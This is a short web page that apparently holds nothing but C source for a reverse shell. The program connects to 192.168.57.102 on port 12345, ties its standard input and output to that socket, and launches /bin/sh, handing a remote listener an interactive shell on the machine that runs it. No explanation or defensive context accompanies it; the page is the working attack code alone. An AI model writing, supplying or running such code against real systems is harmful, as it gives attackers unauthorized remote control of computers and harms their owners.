<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>C-Language-Reverse-Shell</title>
</head><body>#include &lt;stdio.h&gt;<br/>
#include &lt;stdlib.h&gt;<br/>
#include &lt;string.h&gt;<br/>
#include &lt;unistd.h&gt;<br/>
#include &lt;sys/types.h&gt;<br/>
#include &lt;sys/socket.h&gt;<br/>
#include &lt;netinet/in.h&gt;<br/>
<br/>
int main(void) {<br/>
&nbsp; &nbsp; int sockfd; &nbsp; &nbsp; &nbsp; &nbsp; <br/>
&nbsp; &nbsp; int lportno = 12345; &nbsp; &nbsp;<br/>
&nbsp; &nbsp; struct sockaddr_in serv_addr;<br/>
&nbsp; &nbsp; char *const params[] = {"/bin/sh",NULL};<br/>
&nbsp; &nbsp; char *const environ[] = {NULL};<br/>
<br/>
&nbsp; &nbsp; sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);<br/>
&nbsp; &nbsp; serv_addr.sin_family = AF_INET;<br/>
&nbsp; &nbsp; serv_addr.sin_addr.s_addr = inet_addr("192.168.57.102");<br/>
&nbsp; &nbsp; serv_addr.sin_port = htons(lportno); &nbsp;<br/>
&nbsp; &nbsp; connect(sockfd, (struct sockaddr *) &amp;serv_addr, 16);<br/>
<br/>
&nbsp; &nbsp; dup2(sockfd,0);<br/>
&nbsp; &nbsp; dup2(0,1);<br/>
&nbsp; &nbsp; dup2(0,2);<br/>
&nbsp; &nbsp; execve("/bin/sh",params,environ);<br/>
}</body></html>